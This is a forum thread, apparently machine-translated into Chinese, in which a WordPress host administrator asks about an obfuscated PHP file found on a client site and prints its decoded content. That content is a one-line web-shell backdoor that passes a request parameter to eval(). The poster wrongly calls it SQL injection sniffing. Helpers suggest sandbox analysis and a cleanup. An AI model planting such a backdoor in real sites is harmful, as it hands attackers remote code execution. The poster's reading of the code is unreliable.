我为小型客户网站运行了一些带有几十个WordPress安装的VPS。
我刚注意到一个网站有一个名为“pnxnfup.php”的php脚本,里面有一个加载base64字母数字字符。
在网站的根目录中还有很多没有扩展名的文件 - 只是随机的字母字符串 - 如果说文件看起来像IP地址正在记录 - 我猜这些是访客IP地址(我的是有)。
任何人都知道这可能是什么类型的漏洞利用?
更新时间:2012年12月18日
好的,我设法解码了pnxnfup.php的内容
当我解码原始的php文件时,它包含了更多base64编码的内容,其中包含随机的乱码php注释,在我解码文件的其余部分之前,我必须手动删除它。
一旦我解码,我发现更多base64编码的字符串与更多的乱码php评论。一旦我重复了剥离和解码过程(p!),我就离开了:
if(isset($_REQUEST['a'.'s'.'c']))
eval
(stripslashes($_REQUEST['a'.'sc']));
我大致了解这段代码正在做什么(使用asc参数嗅探请求,这些参数表示可以针对sql注入的目标)但我不知道这对于黑客本身有多大价值。我猜测黑客必须渗透得更深,而我却错过了其他的东西?
答案 0 :(得分:1)
但究竟是什么东西很难说,如果我是你,我会设置一个沙盒环境,并用它来解决这个黑客的目的。
答案 1 :(得分:1)
可能这个网站使用的是“免费”主题。其中大多数都有代码来收集您的密码并登录以在您的网站上添加恶意软件脚本。你有自己的网站备份吗?我强烈建议您清理所有文件,然后更改您的FTP密码(如果可能,请登录),然后重新上传所有文件。
不过,也许Sucuri可以帮助您找到一些受感染的文件:http://sitecheck.sucuri.net/results/YOURURL.com/